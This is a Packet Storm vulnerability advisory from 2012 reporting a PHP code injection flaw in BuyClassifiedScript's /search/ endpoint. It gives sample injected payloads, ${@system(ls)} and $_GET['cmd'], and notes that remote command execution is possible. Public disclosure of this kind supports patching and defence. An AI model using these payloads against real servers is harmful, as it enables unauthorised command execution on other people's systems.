BuyClassifiedScript PHP Code Injection

2012-11-25T00:00:00
ID PACKETSTORM:118350
Type packetstorm
Reporter d3b4g
Modified 2012-11-25T00:00:00

Description

                                        
                                            `# Exploit Title: buyclassifiedscript PHP code injection vulnerability  
# Date: 25.11.201  
# Exploit Author: d3b4g  
# Vendor Homepage: http://buyclassifiedscript.com/  
# Tested on:Windows 7  
# Blog: d3b4g.me  
  
  
  
  
----------------------------------------------------------------------------------  
  
This vulnerability allows an attacker to inject custom code  
into the server side scripting engine.It's possible to get a remote cmd by taking  
advantage of this vulnerability.  
  
  
Vulnerable function:  
  
/search/  
  
  
() php code excution :  
  
  
http://localhost/path/search {Inject malicious code}  
  
  
() example of code you can inject:  
  
  
// ${@system(ls)}  
  
${@print(hello)}  
  
$_GET['cmd']  
  
  
//   
  
  
  
-end-  
  
`